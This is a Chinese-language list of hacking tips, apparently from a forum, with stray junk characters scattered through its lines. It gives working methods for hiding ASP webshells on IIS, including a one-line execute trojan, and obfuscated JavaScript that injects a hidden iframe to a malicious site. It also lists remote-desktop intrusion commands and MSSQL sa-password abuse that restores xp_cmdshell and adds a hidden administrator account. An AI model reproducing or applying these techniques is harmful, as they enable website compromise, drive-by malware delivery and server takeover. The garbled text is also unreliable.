53、隐藏ASP后门的两种方法
. {8 X) G* q) u n1、建立非标准目录:mkdir images..\
% o6 m! a4 f/ G; x F拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% K6 s+ d4 P* D: P
通过web访问ASP木马:http://ip/images../news.asp?action=login
! |) L! C' ?1 S, L) L& M如何删除非标准目录:rmdir images..\ /s
* ]9 T/ j5 o7 j/ U$ \2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* T; w+ _' Q, P7 ?mkdir programme.asp* V& Q# A9 l) z2 ?7 d/ k
新建1.txt文件内容:<!--#include file=”12.jpg”-->4 l4 [* G5 a$ W, }! f7 ] D2 l, E+ t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
: h$ l1 c* n0 i0 x6 p6 w, w! Uattrib +H +S programme.asp
: c9 A- [) }/ d9 F9 R通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
) H0 J( U: Q5 B2 Y* g4 [/ ^. t; e- `3 @" G& U8 _1 I$ e; C
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。) V2 u: ]8 k3 v# P7 `6 _$ a( f6 K
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
5 H' u! }3 a: l6 c+ m4 b: i$ t. Z' a$ {, }2 C. C `
55、JS隐蔽挂马1 j# G9 d& C C8 |# [- |
1.0 F" b3 U- r3 Z: T
var tr4c3="<iframe src=ht";
2 j! q; N' e6 F7 H2 Ftr4c3 = tr4c3+"tp:/";( P; P4 r9 H+ p# K: F4 N, q4 G
tr4c3 = tr4c3+"/ww";
7 ` `5 O; _# E% ^- L7 G9 q( G, w4 _! ktr4c3 = tr4c3+"w.tr4";8 s/ R" n8 Y3 O. X% a ?
tr4c3 = tr4c3+"c3.com/inc/m";
. o( h4 a V6 G/ ztr4c3 = tr4c3+"m.htm style="display:none"></i";
1 I5 }9 U$ h5 {( Z8 [+ t; Qtr4c3 =tr4c3+"frame>'"; S9 [8 f' ^& I; o: Z. W
document.write(tr4c3);& N' L. E0 ]- L/ a! N' @" g
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
* G+ K; O+ e; d9 V6 S7 @, |. u( N6 l1 D! a$ j! U& {. b
2.$ `: T5 v( K4 ^& Z- n9 N1 H$ q6 v
转换进制,然后用EVAL执行。如
! m7 {, R% o+ _( n. Qeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
7 ` @# ~6 H* P: F不过这个有点显眼。5 n l7 @2 O2 E1 G* u; M0 F
3.
6 K/ y! [, R- Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');3 E! M- m9 E- N4 n& M/ z
最后一点,别忘了把文件的时间也修改下。
7 I& x5 e) H) C# z( T. Y
; b( r8 e/ ~$ O4 L3 T; T3 Y2 s56.3389终端入侵常用DOS命令
& j; E6 w4 [# \! z4 K9 Mtaskkill taskkill /PID 1248 /t
5 n8 z% E, e; v+ w, l2 @1 M. q
5 t& X8 U$ ]. p) v) E& otasklist 查进程8 O, }( q& B1 u- H6 L
1 Y6 A6 w7 Q5 y! [6 F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 B! g( J8 U7 d C5 Xiisreset /reboot, K/ d U! V1 C; h
tsshutdn /reboot /delay:1 重起服务器( o8 N, `& u9 ^% Z' T$ z2 c
/ ^- r! c" E$ ~( @logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,7 q1 [" R$ G" O5 T9 i1 D
! i; q8 @6 U5 d* l; |8 r
query user 查看当前终端用户在线情况. Q$ m6 O* ]6 v
& }9 Q5 \7 O- T2 e" o# G
要显示有关所有会话使用的进程的信息,请键入:query process *
& H, M6 j& b) ~2 |& C. B j) q( H8 Y$ |/ t: r
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 n* |- y( b a: D
* H3 H; L R+ R( {, t! R
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2! G# K& t9 w" i. E9 a
" b7 d3 }5 k; g/ F2 \2 t2 E% u( a g
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM029 C @3 ]8 A7 i3 p
8 A. U- l9 }$ }* Q' J; r
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% U! w ] t/ R0 E7 m9 i) i1 l2 j6 w$ O A0 t* c! L
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统- h# p7 ]5 f" t/ _0 l6 |# I
; j4 }0 q* T0 z命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 _) A4 M6 A% \# B- ~. F6 @! l
' }' }# Z8 L6 p- q! @ ?命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机# Y7 l% e9 h4 q/ r# H" G1 g
6 X! \: B( b3 H9 P& @; p
56、在地址栏或按Ctrl+O,输入:
; J$ P! _6 d7 j* mjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;1 { {4 }8 u+ H/ p2 l0 `. B. a! a4 _
* j+ `4 I" [7 B( |6 F0 t" ]- M" s
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
+ }8 g1 K! @3 G) g9 S
) _0 _$ m6 ?/ w2 G: K/ X2 H$ p57、net user的时候,是不能显示加$的用户,但是如果不处理的话, { h2 E8 V* }6 D4 J: N7 y
用net localgroup administrators是可以看到管理组下,加了$的用户的。2 \$ _; l& m* M+ U
( N/ g$ w3 |* `0 X) L
58、 sa弱口令相关命令
, K6 k/ i/ H! \- U. H6 `2 M: w7 G3 C
一.更改sa口令方法:
' T0 ?- f1 }6 l A2 `5 K- S用sql综合利用工具连接后,执行命令:
. `3 u* F- b/ K$ {exec sp_password NULL,'20001001','sa'1 Z2 S" s- H& X8 i1 W2 v0 ^
(提示:慎用!); D5 p8 e" G3 {* Q6 f
' m- t% M0 D; r. n, g/ X `7 G
二.简单修补sa弱口令.
+ m3 R! {& w, G! K& G5 {2 e# k8 G; J
6 F. ]# K& _( `& W* r8 T方法1:查询分离器连接后执行:
* t2 `0 l# S$ F" l- a! sif exists (select * from
& g% V% `1 A& V$ A& ldbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and9 F7 I" u- G7 o( I( ~
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
6 t$ J# t7 ]) |# V# D& ]; z) q6 r, u( i" F
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
; h: n- L" \$ G2 O+ h$ k* @' t
# d+ B- t. x) U' U+ ]2 q. TGO) i2 P+ l9 T3 J1 \. J/ T: d2 U
^# e) j7 W0 R' a, p5 A$ h
然后按F5键命令执行完毕6 J3 N5 ?0 `! J* S: z4 H. @
. d2 `7 ]- x7 x. b% s. f方法2:查询分离器连接后! d8 `: K0 O9 y1 Y6 V* |. C% s
第一步执行:use master( F6 c! N1 h) r) Y; O; N
第二步执行:sp_dropextendedproc 'xp_cmdshell'
9 P+ F/ f- o% S! |, @- B( Z: I然后按F5键命令执行完毕6 a; K, w' q; e$ ]" A% {
* S; e& c J' l6 `6 O% H% |
; `1 ?' U4 z- j% z* [三.常见情况恢复执行xp_cmdshell.5 r) V0 o, i2 }
2 Z: @$ f+ C, z, _$ ~) f; C
$ q0 g* t5 D4 U H6 r; K1 未能找到存储过程'master..xpcmdshell'.: P0 \4 u7 B3 k2 n4 o+ Z' Y5 S) P
恢复方法:查询分离器连接后,
4 i' D% H) @$ n" S7 k7 S第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
$ K9 X+ O; T e2 S第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( R. P# \- I1 P4 z6 A7 k3 c
然后按F5键命令执行完毕
" Y# Q9 G) P* f c1 J5 c1 ~' e; e* z8 b) f8 Q
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 k6 P% [' U' R- I+ c. b恢复方法:查询分离器连接后,) V, Q' K% R. d) j! D+ O u* e8 m
第一步执行:sp_dropextendedproc "xp_cmdshell"; X3 o5 Y0 r, d
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- a) X. A7 y( _. A. i+ h然后按F5键命令执行完毕
7 F j$ h: {, o* Q
* q3 J& \1 N8 J* {, _, e. r' g$ M( G3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( {2 f5 d6 y0 C+ S9 P) ~$ M
恢复方法:查询分离器连接后, c# p; V) V$ @; W$ [8 [
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
3 [6 g: h3 c" I, h7 E2 D0 @第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ! l5 `7 l1 g! }- S& a9 }& z! E; y0 V1 s+ {
然后按F5键命令执行完毕
, ?4 y# J; n1 n/ v Y$ |3 I& D9 c* ?& N' [3 l# N# {" m% I+ d# m
四.终极方法." `2 `1 Z+ g. J: i
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
( T) e3 [" c/ i/ P1 `- ]2 }查询分离器连接后,
4 _& D( g& m$ Y# j' P2000servser系统:
+ X5 H' \1 T' x% A& G$ s( V' zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
' d! \9 |; F( L8 ?7 j2 A% J* @
8 ^0 O% N( b: S/ h! _3 { B1 m. s( Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 J" r- J3 \/ i; w
* n$ O5 |/ `8 u3 [5 V t
xp或2003server系统:
& @+ K1 [, R9 o
1 ~! Y+ k) {+ v# j: ^1 ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
' ?9 v! k: ~, T1 [8 v- E4 x/ r: f6 s, P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ I: ]9 r- `3 y3 _
|